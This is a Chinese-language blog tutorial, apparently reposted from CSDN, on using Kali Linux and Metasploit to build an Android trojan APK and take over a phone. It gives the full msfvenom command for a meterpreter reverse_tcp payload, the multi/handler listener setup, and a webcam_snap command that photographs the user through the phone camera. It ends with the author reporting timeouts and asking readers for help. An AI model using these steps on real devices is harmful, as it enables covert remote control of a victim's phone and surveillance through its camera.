kali生成安卓木马并控制手机

攻击机:kali,ip:192.168.43.16

目标:OPPO A37t

需要输入的命令会用<>标记出来

为了后面不用再打开,我就直接打开Metaploit msfconsole了

可以使用ifconfig查看kali的ip,此处不截图

使用

<msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 R > /root/Desktop/hack.apk>

命令生成木马apk到桌面,

可以看到,木马apk有10090bytes大小,(10kb左右)

其中:

-p android/meterpreter/reverse_tcp:使用payload(连接方式)很好理解,p为payload的首字母,因为meterpreter/reverse_tcp会反弹meterpreter会话,比较好用,所以我使用了这个payload

LHOST=192.168.43.16 :建立远程连接主机的ip(代表local host)

LPORT=4444 : 连接端口设置为4444。

R > /root/Desktop/hack.apk : 在root/Desktop/目录下生成名为hack.apk的apk文件。

好了,我们先不用急着把木马传给目标设备,可以先打开监听端口,准备好一切

<use multi/handler>

现在,使用连接方式

<set payload android/meterpreter/reverse_tcp>

可以使用show options查看需要设置的参数,其中yes就是需要设置参数地方

<show options>

可以看到,我们需要设置LHOST

所以<set LHOST 192.168.43.16>

好了,开始监听

<exploit>

当目标安装并打开木马时,会发送一个连接请求到我们的kali(这就是使用meterpreter/reverse_tcp的好处),并顺利连接,然而。。。悲催的我表示内牛满面,连接极为不稳定,而且只能打开meterpreter会话端,再想搞事情。。。根本不可能。

可以看到目标发送远程连接请求,然而我的手机却不知为何如此调皮,我打开了3次,终于连接会话端口meterpreter

<webcam_snap -i 1>是使用摄像头拍摄,并保存的kali中

接下来的命令却不顺利,连续超时,最终失败了,实在搞不明白了

我很愿意与大家交流,共同进步,希望终有一天,实战不再超时

希望大佬能帮助解答,小伙子在此多谢了

猜你喜欢

转载自blog.csdn.net/k17010/article/details/80030652
今日推荐